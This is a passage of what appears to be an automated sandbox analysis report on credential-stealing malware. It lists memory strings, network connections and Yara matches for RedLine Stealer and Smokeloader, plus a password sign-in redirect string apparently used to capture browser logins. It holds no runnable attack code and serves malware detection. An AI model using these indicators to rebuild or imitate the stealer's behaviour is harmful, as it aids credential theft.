Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191842126.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CF19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: 79ddad050f.exe, 00000008.00000003.3071958738.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3241098493.0000000001039000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346346381.000001C237BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.27.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3641525579.000001C23DEF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150637847.000001C23BE3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150450150.000001C23BE1D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150800700.000001C23BE60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238548000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150956567.000001C23BE81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150183043.000001C23C300000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001B.00000002.3649402880.000001C23EB29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DDA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: 79ddad050f.exe, 00000008.00000003.3071958738.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3093905264.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3241098493.0000000001039000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346346381.000001C237BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.27.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3180385718.000001C2447D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3178681341.000001C244797000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/searchcb8e7210-9f0b-48fa-8708-b9a03df79eeaa620b506-c3ae-4332-97bb-19
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/onPrefEnabledChanged()
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23EDE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3641525579.000001C23DEF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150637847.000001C23BE3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E02D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3436711953.000001C239BD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150450150.000001C23BE1D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150800700.000001C23BE60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238548000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150956567.000001C23BE81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150183043.000001C23C300000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3637244801.000001C23DAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3206512868.000001C23E161000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3206512868.000001C23E161000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191842126.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DDA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mobilesuica.com/
Source: firefox.exe, 0000001B.00000002.3351019948.000001C238410000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3264796864.0000001AF627B000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346986289.000001C237CA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351019948.000001C2384B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351019948.000001C2384D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001B.00000002.3624313828.000001C23CBC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3181465524.000001C244A29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3193714201.000001C244A82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/Microsurvey
Source: 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: firefox.exe, 0000001B.00000002.3645713303.000001C23E5E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/about/legal/terms/subscription-services/
Source: 79ddad050f.exe, 00000008.00000003.3033865099.0000000005A07000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3636872771.000001C23D9D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 0000001B.00000002.3645713303.000001C23E5E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/subscription-services/
Source: 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource:///modules/UrlbarResult.sys.mjsresource://gre/modules/A
Source: 79ddad050f.exe, 00000008.00000003.3033865099.0000000005A07000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3636872771.000001C23D9D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: firefox.exe, 0000001B.00000002.3346346381.000001C237B52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: 79ddad050f.exe, 00000008.00000003.3033865099.0000000005A07000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3648786422.000001C23EA51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346986289.000001C237CA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/get
Source: firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191842126.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D804000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/toolkit/about/aboutPlugins.ftlset
Source: firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CF19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3653135084.000001C23FB06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001B.00000002.3646061223.000001C23E603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351019948.000001C238410000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23EDC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191961267.000001C23EB6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3653135084.000001C23FB7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3649402880.000001C23EB6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3190903073.000001C23EDDA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3438395331.000001C23B6DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191961267.000001C23EBEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 0000001B.00000002.3628973173.000001C23CF21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3190903073.000001C23EDE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191961267.000001C23EB6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3646061223.000001C23E6C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3648786422.000001C23EA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3284540763.000001C22C039000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23EDE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3286911695.000001C22C303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3286911695.000001C22C311000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3626934066.000001C23CEBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3637244801.000001C23DA29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3653135084.000001C23FB7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3286911695.000001C22C36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3649402880.000001C23EB6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3626934066.000001C23CEB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3652245578.000001C23F184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3285616867.000001C22C1B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000019.00000002.3131490977.000001D01635A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3137720928.000001B4B4117000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3284540763.000001C22C039000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdArgument
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdhttp://mozilla.org/#
Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49894 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49906 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49913 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49934 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49948 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49967 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49972 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49973 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49974 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:50042 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.3265730716.0000000000FFC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.3279910131.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Binary is likely a compiled AutoIt script file
Source: ba17bbfb21.exe, 0000000B.00000002.3194386177.0000000000672000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_c65cbd94-e
Source: ba17bbfb21.exe, 0000000B.00000002.3194386177.0000000000672000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_2e0a1f05-7
Source: ba17bbfb21.exe.6.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_3992bab5-c
